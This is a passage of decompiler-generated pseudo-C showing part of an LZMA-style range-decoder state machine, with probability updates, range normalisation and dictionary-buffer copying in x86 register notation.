                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t156 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t156;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L48:
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      												__esi = __edx + __eax;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                      													__ebx = _t170;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													continue;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L46;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L54:
                                                                                                                                                                                      											_t173 = __ebp - 0x34;
                                                                                                                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      											__eflags =  *_t173;
                                                                                                                                                                                      											goto L55;
                                                                                                                                                                                      										case 0xf:
                                                                                                                                                                                      											L58:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t203 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t203;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L60:
                                                                                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                                                                                      												L55:
                                                                                                                                                                                      												__al =  *(__ebp - 0x44);
                                                                                                                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      												goto L56;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L61:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      											__edx = __ebx + __ebx;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      											__esi = __edx + __eax;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                      												__ebx = _t217;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edi;
                                                                                                                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L60;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x10:
                                                                                                                                                                                      											L109:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t365 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t365;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											goto L111;
                                                                                                                                                                                      										case 0x11:
                                                                                                                                                                                      											L69:
                                                                                                                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      												goto L133;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x12:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      											goto L130;
                                                                                                                                                                                      										case 0x13:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												_t469 = __ebp - 0x58;
                                                                                                                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      												__eflags =  *_t469;
                                                                                                                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      												L144:
                                                                                                                                                                                      												 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                      												goto L145;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      											L130:
                                                                                                                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      											 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      											goto L144;
                                                                                                                                                                                      										case 0x14:
                                                                                                                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      											 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                      											goto L1;
                                                                                                                                                                                      										case 0x15:
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      											__al = __al & 0x000000fd;
                                                                                                                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      											goto L120;
                                                                                                                                                                                      										case 0x16:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      											__eflags = __eax - 4;
                                                                                                                                                                                      											if(__eax >= 4) {
                                                                                                                                                                                      												_push(3);
                                                                                                                                                                                      												_pop(__eax);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                                                                                      											 *(__ebp - 0x40) = 6;
                                                                                                                                                                                      											__eax = __eax << 7;
                                                                                                                                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      											goto L145;
                                                                                                                                                                                      										case 0x17:
                                                                                                                                                                                      											L145:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      											 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                      											goto L149;
                                                                                                                                                                                      										case 0x18:
                                                                                                                                                                                      											L146:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t484 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t484;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L148:
                                                                                                                                                                                      											_t487 = __ebp - 0x48;
                                                                                                                                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      											__eflags =  *_t487;
                                                                                                                                                                                      											L149:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      											if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                      												__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                      												0 = 1;
                                                                                                                                                                                      												__eax = 1 << __cl;
                                                                                                                                                                                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                      													goto L1;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      											__esi = __edx + __eax;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eax = __eax - __ecx;
                                                                                                                                                                                      												__edx = __edx + 1;
                                                                                                                                                                                      												__eflags = __edx;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      												 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edi;
                                                                                                                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L148;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L146;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x19:
                                                                                                                                                                                      											__eflags = __ebx - 4;
                                                                                                                                                                                      											if(__ebx < 4) {
                                                                                                                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                      												L119:
                                                                                                                                                                                      												_t393 = __ebp - 0x2c;
                                                                                                                                                                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                      												__eflags =  *_t393;
                                                                                                                                                                                      												L120:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												if(__eax == 0) {
                                                                                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      												_t400 = __ebp - 0x60;
                                                                                                                                                                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                      												__eflags =  *_t400;
                                                                                                                                                                                      												goto L123;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx = __ebx;
                                                                                                                                                                                      											__eax = __ebx;
                                                                                                                                                                                      											__ecx = __ebx >> 1;
                                                                                                                                                                                      											__eax = __ebx & 0x00000001;
                                                                                                                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                      											__al = __al | 0x00000002;
                                                                                                                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                      											__eflags = __ebx - 0xe;
                                                                                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      											if(__ebx >= 0xe) {
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                      												L102:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      													__eax = __eax + __ebx;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													L108:
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                      													L112:
                                                                                                                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                      														_t391 = __ebp - 0x2c;
                                                                                                                                                                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                      														__eflags =  *_t391;
                                                                                                                                                                                      														goto L119;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													__esi = __edi + __eax;
                                                                                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      													__ax =  *__esi;
                                                                                                                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                      														__ecx = 0;
                                                                                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                      														__ecx = 1;
                                                                                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      														__ebx = 1;
                                                                                                                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                      														__ebx = 1 << __cl;
                                                                                                                                                                                      														__ecx = 1 << __cl;
                                                                                                                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                      														__cx = __ax;
                                                                                                                                                                                      														__cx = __ax >> 5;
                                                                                                                                                                                      														__eax = __eax - __ecx;
                                                                                                                                                                                      														__edi = __edi + 1;
                                                                                                                                                                                      														__eflags = __edi;
                                                                                                                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      														 *__esi = __ax;
                                                                                                                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                      														0x800 = 0x800 - __ecx;
                                                                                                                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      														 *__esi = __dx;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      														L111:
                                                                                                                                                                                      														_t368 = __ebp - 0x48;
                                                                                                                                                                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                      														__eflags =  *_t368;
                                                                                                                                                                                      														goto L112;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L109;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      													__ebx = __ebx | 0x00000001;
                                                                                                                                                                                      													__eflags = __ebx;
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													L101:
                                                                                                                                                                                      													_t338 = __ebp - 0x48;
                                                                                                                                                                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      													__eflags =  *_t338;
                                                                                                                                                                                      													goto L102;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L99;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__edx =  *(__ebp - 4);
                                                                                                                                                                                      											__eax = __eax - __ebx;
                                                                                                                                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                      											goto L108;
                                                                                                                                                                                      										case 0x1a:
                                                                                                                                                                                      											L56:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                      											__al =  *(__ebp - 0x5c);
                                                                                                                                                                                      											__edx =  *(__ebp - 8);
                                                                                                                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                      											__eax = __ecx + 1;
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      											__edx = _t192;
                                                                                                                                                                                      											goto L79;
                                                                                                                                                                                      										case 0x1b:
                                                                                                                                                                                      											L75:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__edx =  *(__ebp - 8);
                                                                                                                                                                                      											__cl =  *(__eax + __edx);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      											 *(__eax + __edx) = __cl;
                                                                                                                                                                                      											__eax = __eax + 1;
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      											__edx = _t274;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      											_t283 = __ebp - 0x64;
                                                                                                                                                                                      											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      											__eflags =  *_t283;
                                                                                                                                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                      											L79:
                                                                                                                                                                                      											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                      											goto L80;
                                                                                                                                                                                      										case 0x1c:
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L123:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__edx =  *(__ebp - 8);
                                                                                                                                                                                      												__cl =  *(__eax + __edx);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      												 *(__eax + __edx) = __cl;
                                                                                                                                                                                      												__eax = __eax + 1;
                                                                                                                                                                                      												__edx = 0;
                                                                                                                                                                                      												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      												__edx = _t414;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
